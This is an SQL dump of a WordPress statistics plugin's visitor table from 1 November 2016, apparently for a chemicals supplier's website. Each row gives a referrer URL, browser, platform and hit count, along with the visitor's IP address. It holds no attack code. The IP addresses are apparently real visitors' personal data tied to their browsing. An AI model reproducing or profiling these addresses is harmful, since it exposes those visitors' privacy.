INSERT INTO `wp_statistics_visitor` VALUES (14483, '2016-11-01', 'https://www.miller-stephenson.com/product/epoxy-stripping-agent/', 'Firefox', 'Windows', '49.0', '', '74.62.85.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14484, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.142.254.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14485, '2016-11-01', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.57.119.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14486, '2016-11-01', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/', 'Safari', 'Macintosh', '6.1.6', '', '73.14.11.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14487, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '185.26.106.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14488, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0ahUKEwjWlv3i44fQAhVC6yYKHdkiDmw4ChAWCG0wAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fteflon-white-lithium-grease%2F&usg=AFQjCNH56JBTzVQsKdrth_h80V1PIZXCFg&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '65.114.20.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14489, '2016-11-01', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14490, '2016-11-01', 'https://www.google.co.uk/', 'Chrome', 'Windows', '38.0.2125.101', '', '194.105.113.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14491, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14492, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '97.104.224.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14493, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14494, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.175.12.2', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14495, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.242.84.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14496, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.235.84.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14497, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '74.120.203.91', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14498, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwis_-y47IfQAhVDPYEKHfqLBYwYABAA&sig=AOD64_0crO93ZJr6LR2j5x9S30TaIaldyA&rct=j&q=&ved=0ahUKEwjDwem47IfQAhWMKyYKHT69AmQQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '66.208.188.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14499, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '204.62.206.254', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14500, '2016-11-01', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '32.0', '', '196.196.94.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14501, '2016-11-01', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '196.196.94.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14502, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjwmJuO7YfQAhVK_4MKHaoNBWAQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '74.218.2.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14503, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjl18_a64fQAhWLA2kKHVYpD98YABAB&sig=AOD64_09H7IXbyE-ONss2X0lqvtaEeydVQ&rct=j&q=&ved=0ahUKEwiU2Mva64fQAhXG3YMKHQ6DD3kQ0QwIIQ&adurl=', 'MSIE', 'Windows', '11.0', '', '204.28.31.3', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14504, '2016-11-01', 'https://www.bing.com/search?q=GPL-215&form=IE11TR&src=IE11TR&pc=EUPP_DCJB', 'MSIE', 'Windows', '11.0', '', '207.70.166.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14505, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.34.78.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14506, '2016-11-01', 'https://parlament.biz/', 'Unknown', 'Unknown', 'Unknown', '', '176.8.88.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14507, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14508, '2016-11-01', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '24.233.113.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14509, '2016-11-01', 'https://www.bing.com/search?q=miller+release+agent&src=IE-TopResult&FORM=IETR02&conversationid=&adlt=strict', 'MSIE', 'Windows', '11.0', '', '62.189.88.198', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14510, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '67.212.221.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14511, '2016-11-01', 'https://www.google.co.uk/', 'Chrome', 'Windows', '54.0.2840.71', '', '80.229.164.124', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14512, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14513, '2016-11-01', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14514, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjH1puH8ofQAhVDyyYKHX6nAoAQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fptfe-release-agent%2F&usg=AFQjCNFw6-QWL8DA9jxIebLQoD9R9E8z_g&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '72.76.243.111', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14515, '2016-11-01', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.137.246.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14516, '2016-11-01', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.25.4.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14517, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '78.83.112.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14518, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '98.201.224.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14519, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '125.209.235.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14520, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '125.209.235.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14521, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Android', '50.0.2661.89', '', '32.208.252.213', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14522, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14523, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwik1fnA-IfQAhVHjlQKHXHeAccQFgiFATAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fmold-release-agents%2F&usg=AFQjCNHhgyC2pnZej0928BNtU-741d08wg&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '76.79.12.14', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14524, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '73.177.85.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14525, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj_ibaa-YfQAhUHKCYKHWHLCZgQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw', 'MSIE', 'Windows', '11.0', '', '155.95.90.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14526, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.218.97.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14527, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14528, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwigzfHr-YfQAhUF4SYKHbI6A68QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '12.46.184.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14529, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj9396r-ofQAhWEL4EKHdbgAgoYABAA&ei=2r8YWJ2BKojImQHNxbTQDg&sig=AOD64_3f9YMDG9jje8WBb76Zhl7R-yQEjA&rct=j&q=&sqi=2&ved=0ahUKEwid1tqr-ofQAhUIZCYKHc0iDeoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '206.37.203.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14530, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14531, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.133.208.250', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14532, '2016-11-01', 'https://www.google.co.il/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwiB5aL1-4fQAhVBWRoKHRmLB3QQFghDMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA&bvm=bv.137132246,d.d2s', 'MSIE', 'Windows', '11.0', '', '199.203.215.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14533, '2016-11-01', 'https://www.google.com', 'Firefox', 'Windows', '43.0', '', '136.242.188.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14534, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '74.209.145.156', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14535, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwix5pvU_YfQAhWTZX4KHS-_Cr8YABAH&sig=AOD64_35FC1NtBKe61e3akflbgGBvA0nrg&rct=j&q=&ved=0ahUKEwiK4pfU_YfQAhVJy1QKHcyhAyYQ0QwIQA&adurl=', 'MSIE', 'Windows', '11.0', '', '141.248.23.148', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14536, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '104.138.162.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14537, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.73.36.140', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14538, '2016-11-01', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.20.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14539, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '68.119.132.217', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14540, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '132.207.255.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14541, '2016-11-01', 'https://doxyporno.com/', 'MSIE', 'Windows', '6.0', '', '178.137.86.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14542, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '72.193.57.172', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14543, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '216.71.231.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14544, '2016-11-01', 'https://www.google.com.co/', 'Chrome', 'Windows', '54.0.2840.71', '', '181.50.217.44', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14545, '2016-11-01', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '208.101.82.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14546, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj81JqugYjQAhWKSiYKHQfpAIUQFggmMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw', 'MSIE', 'Windows', '11.0', '', '144.191.148.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14547, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '129.176.151.10', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14548, '2016-11-01', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '129.176.151.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14549, '2016-11-01', 'https://www.miller-stephenson.com/chemical-products/', 'Chrome', 'Windows', '54.0.2840.71', '', '129.176.151.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14550, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14551, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14552, '2016-11-01', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '128.115.190.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14553, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.73.139.49', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14554, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14555, '2016-11-01', 'https://www.miller-stephenson.com/product/157-fsl/', 'Chrome', 'Windows', '53.0.2785.143', '', '157.204.1.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14556, '2016-11-01', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '195.154.242.146', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14557, '2016-11-01', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '31.0.1650.57', '', '91.109.19.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14558, '2016-11-01', 'https://search.yahoo.com/', 'Firefox', 'Windows', '49.0', '', '174.69.189.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14559, '2016-11-01', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.2.14', '', '76.168.32.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14560, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjlzqSmh4jQAhUISCYKHfgGDFIQFgg3MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fvazo%2F&usg=AFQjCNHY9PYcotxzZs4ETcH5s9OXED1qqw', 'MSIE', 'Windows', '11.0', '', '192.28.0.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14561, '2016-11-01', 'https://www.google.ru/', 'Opera Next', 'Windows', '41.0.2353.46', '', '188.226.2.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14562, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14563, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.144.184.50', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14564, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14565, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14566, '2016-11-01', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.35.192.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14567, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '96.244.135.49', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14568, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi838rvi4jQAhXoilQKHQ3VAdgQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '74.93.161.154', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14569, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.224.144.115', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14570, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '45.41.60.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14571, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '45.41.60.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14572, '2016-11-01', 'https://www.google.com.br/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjF47SFjojQAhVFkZAKHVrxA6YQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Furethane-coating%2F&usg=AFQjCNEJ-j-E6u2tyfv_dtPjpHeMEDqBmg&bvm=bv.137132246,d.Y2I', 'MSIE', 'Windows', '11.0', '', '200.174.129.132', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14573, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '204.28.31.3', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14574, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.85.144.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14575, '2016-11-01', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Chrome', 'Windows', '53.0.2785.116', '', '31.14.16.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14576, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14577, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '98.101.140.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14578, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14579, '2016-11-01', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14580, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14581, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14582, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '174.47.212.222', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14583, '2016-11-01', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '208.97.39.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14584, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.37.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14585, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.106', '', '65.114.90.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14586, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj74p3tk4jQAhUHD2kKHVG9D1MYABAA&sig=AOD64_1LbjWCzLZ1q-w0Lgwqh7zETYmOPA&rct=j&q=&ved=0ahUKEwiq0pntk4jQAhVM7oMKHSXnDto4FBDRDAga&adurl=', 'MSIE', 'Windows', '11.0', '', '107.0.179.66', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14587, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '173.208.136.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14588, '2016-11-01', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.77.90.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14589, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14590, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.36.15.81', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14591, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjgqpjJlojQAhVMJIEKHQp0BB4YABAE&ei=dN0YWJeqJMGGmQHOtrqwBw&sig=AOD64_3a08b9FB9HTkwk9NouJHp7-cwQeA&rct=j&q=&sqi=2&ved=0ahUKEwiXtJHJlojQAhVBQyYKHU6bDnYQ0QwIjgE&adurl=', 'MSIE', 'Windows', '11.0', '', '63.117.238.167', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14592, '2016-11-01', 'https://www.bing.com/search?q=ms-262+miller+stephenson&qs=n&form=QBLH&pq=ms-262+miller+stephenson&sc=0-24&sp=-1&sk=&cvid=E8494EE41ADE4423927A2284995B73EB', 'MSIE', 'Windows', '11.0', '', '65.175.129.107', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14593, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '218.92.147.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14594, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '20.91.25.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14595, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&sqi=2&ved=0ahUKEwiagIDml4jQAhVrxoMKHbfmBL0QFggsMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '10.0', '', '207.140.17.128', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14596, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.184.210.109', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14597, '2016-11-01', 'https://cse.google.com/', 'Firefox', 'Windows', '49.0', '', '198.0.133.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14598, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '109.86.115.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14599, '2016-11-01', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.0.2840.71', '', '177.248.193.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14600, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.91.5.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14601, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '108.225.201.194', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14602, '2016-11-01', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '192.189.191.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14603, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '94.86.92.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14604, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi53fXQk4jQAhWVG4EKHVcDBz4YABAA&sig=AOD64_21IgE6NpRSvgwW5amtcR2byib8ZQ&rct=j&q=&ved=0ahUKEwiezvLQk4jQAhUBYSYKHZk4B1gQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '64.83.247.210', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14605, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '192.189.191.9', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14606, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '4.16.99.1', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14607, '2016-11-01', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '51.0.2704.81', '', '209.171.88.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14608, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '208.0.64.246', '000', 3, 0); 
